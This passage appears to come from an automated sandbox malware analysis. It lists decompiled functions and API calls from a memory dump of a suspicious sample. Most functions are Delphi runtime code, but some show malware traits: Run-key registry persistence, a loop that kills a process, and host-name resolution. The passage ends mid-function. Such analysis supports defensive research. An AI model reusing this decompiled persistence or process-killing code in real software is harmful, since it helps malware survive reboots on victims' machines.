				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
